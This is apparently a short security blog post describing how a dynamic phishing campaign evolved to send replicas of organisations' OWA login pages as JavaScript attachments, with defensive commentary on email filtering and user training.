Dynamic email phishing campaign – round two

What happened last time?

In January 2019 we saw attackers launching a large-scale phishing campaign with the unique ability to dynamically generate content. Unlike a generic phishing attempt, this new approach is capable of dynamically changing its content based on the targeted organisation’s email domain.

This allows the malicious actor to widely distribute phishing emails that appear to be much more credible in a much shorter timespan allowing improved quality and quantity and therefore increasing their success rates.

What has changed?

Towards the end of 2021 we saw this go a step further where the target organisation’s branded OWA pages were completely replicated and saved as a JavaScript file attached to a phishing email.

All of the images were included as BASE64 meaning no external connectivity was made until the victim input their credentials.

What can we do about it?

In reality, whilst in some unique circumstances this may prove to be an effective change for the people running the campaign, the chances are this is actually a step back as most organisations will completely block JavaScript files attached to inbound emails.

In addition to this, even with the most basic of end-user training you would expect the targets not to open any emailed JavaScript file and especially not input their credentials after opening one.

If this isn’t more advanced, why is it important?

It is imperative that we keep a close eye on the tactics, techniques, and procedures attackers are using to bypass security technologies, fool end users and attempt to compromise your organisation.

Recognising evolution in these TTPs allows you to make changes to your policies and technologies to ensure you are consistently up-to-date and protected against the latest attack trends.